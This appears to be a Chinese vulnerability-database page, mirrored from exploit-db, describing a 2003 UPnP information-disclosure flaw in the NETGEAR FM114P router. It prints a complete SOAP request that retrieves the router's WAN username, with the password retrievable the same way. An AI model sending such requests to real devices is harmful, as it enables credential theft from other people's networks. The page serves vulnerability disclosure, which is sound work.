NETGEAR FM114P ProSafe Wireless Router – UPnP Information Disclosure

NETGEAR FM114P ProSafe Wireless Router – UPnP Information Disclosure

漏洞ID 1053808 漏洞类型
发布时间 2003-04-03 更新时间 2003-04-03
图片[1]-NETGEAR FM114P ProSafe Wireless Router – UPnP Information Disclosure-安全小百科CVE编号 N/A
图片[2]-NETGEAR FM114P ProSafe Wireless Router – UPnP Information Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22453
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7267/info

The Netgear FM114P ProSafe Wireless Router is vulnerable to information disclosure. If Remote Access and Universal Plug and Play are both enabled on the WAN interface, a UPnP SOAP request can retrieve the username and password for the WAN interface. 

POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:GetUserName
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
</s:Body>
</s:Envelope>

相关推荐: Linux modprobe Arbitrary Command Execution Vulnerability

Linux modprobe Arbitrary Command Execution Vulnerability 漏洞ID 1103736 漏洞类型 Input Validation Error 发布时间 2000-11-12 更新时间 2000-11-12 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享